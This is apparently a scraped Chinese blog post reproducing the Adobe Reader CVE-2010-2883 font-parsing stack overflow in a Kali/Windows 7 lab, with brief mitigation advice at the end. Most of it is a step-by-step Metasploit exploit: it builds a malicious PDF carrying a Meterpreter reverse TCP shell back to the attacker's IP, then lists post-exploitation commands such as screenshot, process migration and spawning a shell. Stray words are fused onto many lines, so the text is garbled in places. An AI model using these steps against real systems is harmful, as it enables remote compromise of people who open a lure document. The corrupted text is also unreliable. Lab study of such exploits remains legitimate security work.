CVE-2010-2883漏洞復現
今天的漏洞復現,選了一個Adobe的一個有關打開pdf就會中招的漏洞。shell
1.原理
Adobe Reader在處理CoolType字體文件的sing表時,存在棧溢出漏洞,當打開特製的惡意PDF文件時,可容許任意代碼遠程執行。windows
2.影響版本
Adobe Reader 8.2.4 - 9.3.4微信
3.漏洞復現環境
Kali Linux + Windows 7 sp1 滲透機:Kali Linux (ip:192.168.95.140) 靶機:Windows 7 sp1 (ip:192.168.95.139) 軟件:Adobe Reader 9.0.exetcp
4.實操
因爲kali的metasploit集成了不少漏洞,所以咱們直接在metasploit上查找adobe_cooltype_sing漏洞進行復現 1.搜索search adobe_cooltype_sing模塊 2.調用滲透模塊 3.查看模板詳情
調用meterpreter載荷,反向鏈接到滲透機 msf exploit(adobe_cooltype_sing) > set payload windows/meterpreter/reverse_tcp 設置Kali Linux的IP地址 msf exploit(adobe_cooltype_sing) > set LHOST 192.168.95.140 設置本地監聽端口 msf exploit(adobe_cooltype_sing) > set LPORT 8888 設置帶有後門程序的PDF文件 msf exploit(adobe_cooltype_sing) > set FILENAME test.pdf 執行滲透生成文件 msf exploit(adobe_cooltype_sing) > exploit
將含有木馬的pdf文件拷貝到桌面 字體
Metasploit開啓shell監聽會話,等待肉雞上線 ui
在windows7上安裝Adobe Reader9.03d
將PDF木馬文件拷貝到Windows 7並打開 code
打開文件後,Metasploit獲取shell會話,並用Meterpreter控制肉雞 blog
查看系統信息 meterpreter > sysinfo 查看當前用戶 meterpreter > getuid 截屏 meterpreter > screenshot
獲取進程 meterpreter > ps 切換進程 meterpreter > migrate 1548
獲取Dos Shell meterpreter > shell C:\Windows\system32>ipconfig
5.實驗總結
能夠看到,一旦電腦打開特殊定製的pdf以後,在沒有攔截的狀況下,直接變成肉雞。真實環境下,不少黑客會利用此方法,結合社會工程學,例如經過郵件、QQ羣、微信羣等多渠道,誘導用戶下載並打開。所以用戶在打開以前必定要明確文件來源,或者用殺毒軟件先殺毒,再打開。另外,就是儘可能保證電腦的軟件處於最新版,這樣才能最大程度下降被攻擊的概率。
6.漏洞修復
下載Adobe Reader最新版本。 安裝常見殺毒軟件,開啓實時防禦和殺毒引擎實時升級。